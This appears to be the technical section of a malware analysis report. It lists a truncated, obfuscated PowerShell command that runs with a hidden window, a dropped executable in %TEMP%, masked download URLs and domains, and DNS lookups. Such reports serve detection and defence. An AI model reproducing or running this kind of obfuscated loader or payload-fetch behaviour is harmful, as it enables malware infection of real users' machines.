Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [sTRing]::jOin('' ,(( 15, 81, 93,66,102 , 110 , 11 , 22, 11,69,78 , 92, 6,68 ,73, 65 , 78,72, 95, 11, 89 ,74 , 69 ,79,68 , 70, 16 ,15 ,68 ,79 ,123 , 120,106, 11 ,22 , 11,69 , 78 ,92, 6,68,73 ,6...
- %TEMP%\476731.exe
- 'za##do.com':80
- '11###a.com.cn':80
- 'an###gsi.com':80
- http://11###a.com.cn/pazjdY/
- http://www.11###a.com.cn/pazjdY/
- DNS ASK za##do.com
- DNS ASK 11###a.com.cn
- DNS ASK ea###bqd.com
- DNS ASK an###gsi.com
- DNS ASK va#####guzellik.com.tr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' [sTRing]::jOin('' ,(( 15, 81, 93,66,102 , 110 , 11 , 22, 11,69,78 , 92, 6,68 ,73, 65 , 78,72, 95, 11, 89 ,74 , 69 ,79,68 , 70, 16 ,15 ,68 ,79 ,123 , 120,106, 11 ,22 , 11,69 , 78 ,92, 6,68,73 ,6...' (with hidden window)